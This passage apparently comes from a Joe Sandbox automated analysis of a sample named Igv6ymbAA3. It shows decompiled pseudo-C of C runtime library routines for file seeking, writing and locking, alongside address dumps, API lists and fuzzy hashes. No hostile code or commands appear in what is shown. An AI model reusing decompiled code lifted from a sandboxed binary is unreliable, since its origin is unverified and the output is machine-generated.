							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}






























                                                                                                                                                                      0x0040c748
                                                                                                                                                                      0x0040c748
                                                                                                                                                                      0x0040c752
                                                                                                                                                                      0x0040c755
                                                                                                                                                                      0x0040c757
                                                                                                                                                                      0x0040c759
                                                                                                                                                                      0x0040c77c
                                                                                                                                                                      0x0040c781
                                                                                                                                                                      0x0040c785
                                                                                                                                                                      0x0040c788
                                                                                                                                                                      0x0040c78a
                                                                                                                                                                      0x0040c78a
                                                                                                                                                                      0x0040c78d
                                                                                                                                                                      0x0040c78f
                                                                                                                                                                      0x0040c790
                                                                                                                                                                      0x0040c791
                                                                                                                                                                      0x0040c799
                                                                                                                                                                      0x0040c79b
                                                                                                                                                                      0x0040c79e
                                                                                                                                                                      0x0040c773
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c7a0
                                                                                                                                                                      0x0040c7a0
                                                                                                                                                                      0x0040c7a3
                                                                                                                                                                      0x0040c7a9
                                                                                                                                                                      0x0040c7b3
                                                                                                                                                                      0x0040c7b5
                                                                                                                                                                      0x0040c7b8
                                                                                                                                                                      0x0040c7bd
                                                                                                                                                                      0x0040c7c0
                                                                                                                                                                      0x0040c7c3
                                                                                                                                                                      0x0040c806
                                                                                                                                                                      0x0040c808
                                                                                                                                                                      0x0040c7f9
                                                                                                                                                                      0x0040c7f9
                                                                                                                                                                      0x0040c7fc
                                                                                                                                                                      0x0040c81a
                                                                                                                                                                      0x0040c81e
                                                                                                                                                                      0x0040c8d8
                                                                                                                                                                      0x0040c8de
                                                                                                                                                                      0x0040c8de
                                                                                                                                                                      0x0040c8e0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c8e0
                                                                                                                                                                      0x0040c824
                                                                                                                                                                      0x0040c827
                                                                                                                                                                      0x0040c829
                                                                                                                                                                      0x0040c843
                                                                                                                                                                      0x0040c84a
                                                                                                                                                                      0x0040c84f
                                                                                                                                                                      0x0040c852
                                                                                                                                                                      0x0040c857
                                                                                                                                                                      0x0040c8d2
                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c8d5
                                                                                                                                                                      0x0040c859
                                                                                                                                                                      0x0040c85b
                                                                                                                                                                      0x0040c85d
                                                                                                                                                                      0x0040c868
                                                                                                                                                                      0x0040c86b
                                                                                                                                                                      0x0040c88d
                                                                                                                                                                      0x0040c88f
                                                                                                                                                                      0x0040c892
                                                                                                                                                                      0x0040c895
                                                                                                                                                                      0x0040c89d
                                                                                                                                                                      0x0040c89f
                                                                                                                                                                      0x0040c8a6
                                                                                                                                                                      0x0040c8ab
                                                                                                                                                                      0x0040c8ae
                                                                                                                                                                      0x0040c8c0
                                                                                                                                                                      0x0040c8c0
                                                                                                                                                                      0x0040c8c3
                                                                                                                                                                      0x0040c8c3
                                                                                                                                                                      0x0040c8c8
                                                                                                                                                                      0x0040c8cd
                                                                                                                                                                      0x0040c8cd
                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                      0x0040c8cf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c8cd
                                                                                                                                                                      0x0040c8b0
                                                                                                                                                                      0x0040c8b3
                                                                                                                                                                      0x0040c8b6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c8b8
                                                                                                                                                                      0x0040c8be
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c8be
                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c8a1
                                                                                                                                                                      0x0040c86d
                                                                                                                                                                      0x0040c873
                                                                                                                                                                      0x0040c880
                                                                                                                                                                      0x0040c880
                                                                                                                                                                      0x0040c882
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c877
                                                                                                                                                                      0x0040c87a
                                                                                                                                                                      0x0040c87c
                                                                                                                                                                      0x0040c87c
                                                                                                                                                                      0x0040c87c
                                                                                                                                                                      0x0040c87c
                                                                                                                                                                      0x0040c87f
                                                                                                                                                                      0x0040c87f
                                                                                                                                                                      0x0040c87f
                                                                                                                                                                      0x0040c884
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c884
                                                                                                                                                                      0x0040c82b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c82b
                                                                                                                                                                      0x0040c7fe
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c7fe
                                                                                                                                                                      0x0040c80a
                                                                                                                                                                      0x0040c80f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c80f
                                                                                                                                                                      0x0040c7ce
                                                                                                                                                                      0x0040c7d8
                                                                                                                                                                      0x0040c7db
                                                                                                                                                                      0x0040c7e0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c7e2
                                                                                                                                                                      0x0040c7e4
                                                                                                                                                                      0x0040c7e6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c7e8
                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                      0x0040c7ed
                                                                                                                                                                      0x0040c7ef
                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                      0x0040c7f2
                                                                                                                                                                      0x0040c7f4
                                                                                                                                                                      0x0040c7f5
                                                                                                                                                                      0x0040c7f5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c7ea
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040c7ab
                                                                                                                                                                      0x0040c79e
                                                                                                                                                                      0x0040c75b
                                                                                                                                                                      0x0040c760
                                                                                                                                                                      0x0040c761
                                                                                                                                                                      0x0040c762
                                                                                                                                                                      0x0040c763
                                                                                                                                                                      0x0040c764
                                                                                                                                                                      0x0040c765
                                                                                                                                                                      0x0040c76b
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241C9AF Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __fileno.LIBCMT ref: 0241C9E3
                                                                                                                                                                      • __locking.LIBCMT ref: 0241C9F8
                                                                                                                                                                        • Part of subcall function 0241C228: __getptd_noexit.LIBCMT ref: 0241C228
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno__getptd_noexit__locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 630670418-0
                                                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                      • Instruction ID: dfdf447e2d5d3c07f664fa660e133da0f82788b237a12d4b519a4d7eb8dde57e
                                                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D51A371E80209AFDB11CF69DDC1B5DBBB1EF04398F14816BD915A7385D730AA81CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                                      			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}



















                                                                                                                                                                      0x00405d00
                                                                                                                                                                      0x00405d00
                                                                                                                                                                      0x00405d00
                                                                                                                                                                      0x00405d01
                                                                                                                                                                      0x00405d07
                                                                                                                                                                      0x00405e7f
                                                                                                                                                                      0x00405e7f
                                                                                                                                                                      0x00405e7f
                                                                                                                                                                      0x00405e83
                                                                                                                                                                      0x00405d0d
                                                                                                                                                                      0x00405d0d
                                                                                                                                                                      0x00405d14
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405d1a
                                                                                                                                                                      0x00405d1a
                                                                                                                                                                      0x00405d20
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405d2f
                                                                                                                                                                      0x00405d34
                                                                                                                                                                      0x00405d38
                                                                                                                                                                      0x00405dad
                                                                                                                                                                      0x00405db0
                                                                                                                                                                      0x00405db2
                                                                                                                                                                      0x00405db2
                                                                                                                                                                      0x00405db2
                                                                                                                                                                      0x00405db5
                                                                                                                                                                      0x00405db7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405dbd
                                                                                                                                                                      0x00405dbd
                                                                                                                                                                      0x00405dc1
                                                                                                                                                                      0x00405df8
                                                                                                                                                                      0x00405dfb
                                                                                                                                                                      0x00405dfd
                                                                                                                                                                      0x00405e04
                                                                                                                                                                      0x00405e09
                                                                                                                                                                      0x00405e0c
                                                                                                                                                                      0x00405e0e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405dff
                                                                                                                                                                      0x00405dff
                                                                                                                                                                      0x00405e10
                                                                                                                                                                      0x00405e10
                                                                                                                                                                      0x00405e12
                                                                                                                                                                      0x00405e73
                                                                                                                                                                      0x00405e78
                                                                                                                                                                      0x00405e14
                                                                                                                                                                      0x00405e14
                                                                                                                                                                      0x00405e18
                                                                                                                                                                      0x00405e2e
                                                                                                                                                                      0x00405e2e
                                                                                                                                                                      0x00405e32
                                                                                                                                                                      0x00405e34
                                                                                                                                                                      0x00405e37
                                                                                                                                                                      0x00405e38
                                                                                                                                                                      0x00405e3c
                                                                                                                                                                      0x00405e43
                                                                                                                                                                      0x00405e45
                                                                                                                                                                      0x00405e45
                                                                                                                                                                      0x00405e43
                                                                                                                                                                      0x00405e4c
                                                                                                                                                                      0x00405e4e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405e50
                                                                                                                                                                      0x00405e50
                                                                                                                                                                      0x00405e50
                                                                                                                                                                      0x00405e55
                                                                                                                                                                      0x00405e57
                                                                                                                                                                      0x00405e59
                                                                                                                                                                      0x00405e59
                                                                                                                                                                      0x00405e61
                                                                                                                                                                      0x00405e66
                                                                                                                                                                      0x00405e69
                                                                                                                                                                      0x00405e6b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405e6d
                                                                                                                                                                      0x00405e6f
                                                                                                                                                                      0x00405e71
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405e71
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405e50
                                                                                                                                                                      0x00405e1a
                                                                                                                                                                      0x00405e1f
                                                                                                                                                                      0x00405e24
                                                                                                                                                                      0x00405e27
                                                                                                                                                                      0x00405e2a
                                                                                                                                                                      0x00405e2c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405e2c
                                                                                                                                                                      0x00405e18
                                                                                                                                                                      0x00405e12
                                                                                                                                                                      0x00405dc3
                                                                                                                                                                      0x00405dc9
                                                                                                                                                                      0x00405dcb
                                                                                                                                                                      0x00405dcc
                                                                                                                                                                      0x00405dcd
                                                                                                                                                                      0x00405dd4
                                                                                                                                                                      0x00405ddb
                                                                                                                                                                      0x00405ddd
                                                                                                                                                                      0x00405de5
                                                                                                                                                                      0x00405de7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405ded
                                                                                                                                                                      0x00405ded
                                                                                                                                                                      0x00405df0
                                                                                                                                                                      0x00405df7
                                                                                                                                                                      0x00405df7
                                                                                                                                                                      0x00405de7
                                                                                                                                                                      0x00405dc1
                                                                                                                                                                      0x00405d3a
                                                                                                                                                                      0x00405d3c
                                                                                                                                                                      0x00405d3e
                                                                                                                                                                      0x00405d3e
                                                                                                                                                                      0x00405d43
                                                                                                                                                                      0x00405e79
                                                                                                                                                                      0x00405e7a
                                                                                                                                                                      0x00405e7a
                                                                                                                                                                      0x00405e7e
                                                                                                                                                                      0x00405d49
                                                                                                                                                                      0x00405d4d
                                                                                                                                                                      0x00405d77
                                                                                                                                                                      0x00405d79
                                                                                                                                                                      0x00405da7
                                                                                                                                                                      0x00405dac
                                                                                                                                                                      0x00405d7b
                                                                                                                                                                      0x00405d80
                                                                                                                                                                      0x00405d80
                                                                                                                                                                      0x00405d87
                                                                                                                                                                      0x00405d89
                                                                                                                                                                      0x00405d89
                                                                                                                                                                      0x00405d91
                                                                                                                                                                      0x00405d96
                                                                                                                                                                      0x00405d9b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405da1
                                                                                                                                                                      0x00405da5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405da5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405d80
                                                                                                                                                                      0x00405d4f
                                                                                                                                                                      0x00405d54
                                                                                                                                                                      0x00405d59
                                                                                                                                                                      0x00405d5c
                                                                                                                                                                      0x00405d61
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405d67
                                                                                                                                                                      0x00405d6f
                                                                                                                                                                      0x00405d74
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405d74
                                                                                                                                                                      0x00405d61
                                                                                                                                                                      0x00405d4d
                                                                                                                                                                      0x00405d43
                                                                                                                                                                      0x00405d38
                                                                                                                                                                      0x00405d20
                                                                                                                                                                      0x00405d14
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                      			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                                      0x0040baaa
                                                                                                                                                                      0x0040baba
                                                                                                                                                                      0x0040bae0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bac1
                                                                                                                                                                      0x0040bac1
                                                                                                                                                                      0x0040bac4
                                                                                                                                                                      0x0040bac6
                                                                                                                                                                      0x0040bae7
                                                                                                                                                                      0x0040baea
                                                                                                                                                                      0x0040baec
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040baee
                                                                                                                                                                      0x0040baf3
                                                                                                                                                                      0x0040baf6
                                                                                                                                                                      0x0040baf9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bafe
                                                                                                                                                                      0x0040bb02
                                                                                                                                                                      0x0040bb09
                                                                                                                                                                      0x0040bb0c
                                                                                                                                                                      0x0040bb0f
                                                                                                                                                                      0x0040bb11
                                                                                                                                                                      0x0040bb1b
                                                                                                                                                                      0x0040bb13
                                                                                                                                                                      0x0040bb16
                                                                                                                                                                      0x0040bb16
                                                                                                                                                                      0x0040bb22
                                                                                                                                                                      0x0040bb24
                                                                                                                                                                      0x0040bbe9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                      0x0040bb2d
                                                                                                                                                                      0x0040bb2d
                                                                                                                                                                      0x0040bb33
                                                                                                                                                                      0x0040bb64
                                                                                                                                                                      0x0040bb64
                                                                                                                                                                      0x0040bb67
                                                                                                                                                                      0x0040bbc0
                                                                                                                                                                      0x0040bbc7
                                                                                                                                                                      0x0040bbca
                                                                                                                                                                      0x0040bbf5
                                                                                                                                                                      0x0040bbf5
                                                                                                                                                                      0x0040bbf7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bbfb
                                                                                                                                                                      0x0040bbcc
                                                                                                                                                                      0x0040bbcf
                                                                                                                                                                      0x0040bbd2
                                                                                                                                                                      0x0040bbd3
                                                                                                                                                                      0x0040bbd6
                                                                                                                                                                      0x0040bbd8
                                                                                                                                                                      0x0040bbda
                                                                                                                                                                      0x0040bbda
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bbd8
                                                                                                                                                                      0x0040bb69
                                                                                                                                                                      0x0040bb6b
                                                                                                                                                                      0x0040bb78
                                                                                                                                                                      0x0040bb78
                                                                                                                                                                      0x0040bb7c
                                                                                                                                                                      0x0040bb7e
                                                                                                                                                                      0x0040bb82
                                                                                                                                                                      0x0040bb84
                                                                                                                                                                      0x0040bb87
                                                                                                                                                                      0x0040bb87
                                                                                                                                                                      0x0040bb87
                                                                                                                                                                      0x0040bb89
                                                                                                                                                                      0x0040bb8a
                                                                                                                                                                      0x0040bb94
                                                                                                                                                                      0x0040bb95
                                                                                                                                                                      0x0040bb9a
                                                                                                                                                                      0x0040bb9d
                                                                                                                                                                      0x0040bba0
                                                                                                                                                                      0x0040bc03
                                                                                                                                                                      0x0040bc03
                                                                                                                                                                      0x0040bc07
